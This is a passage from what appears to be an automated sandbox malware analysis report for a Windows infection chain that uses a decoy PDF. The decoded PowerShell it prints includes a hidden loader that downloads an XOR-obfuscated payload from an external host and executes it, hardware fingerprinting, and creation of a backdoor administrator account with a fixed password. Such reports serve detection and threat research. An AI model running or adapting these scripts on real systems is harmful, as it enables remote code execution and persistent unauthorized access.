        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\Temp\svczHost.exeMemory allocated: 252B3570000 memory reserve | memory write watch
        Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 19CFF4D0000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9910Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9875Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 380
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9843
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9836
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9874
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9881
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9838
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep count: 9875 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4328Thread sleep count: 9913 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10004Thread sleep count: 9843 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10184Thread sleep count: 9836 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10172Thread sleep count: 35 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep count: 9874 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556Thread sleep count: 9881 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 9838 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 55 > 30
        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: eMun`@QeMuj`@
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000005.00000002.3076742691.0000015B6D76D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTr
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
        Source: powershell.exe, 00000009.00000002.4160136439.000001BD75B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWaQ%SystemRoot%\system32\mswsock.dllKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUw
        Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HqEMu
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FMuVU@DEMuRU@lEMunU@qEMujU@-EMufU@
        Source: powershell.exe, 00000001.00000002.3173386732.000001C8390DE000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4400636917.00000252B35E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens | ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } | Out-File -FilePath "C:\Windows\Temp\dp"
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens | ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } | Out-File -FilePath "C:\Windows\Temp\dp"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF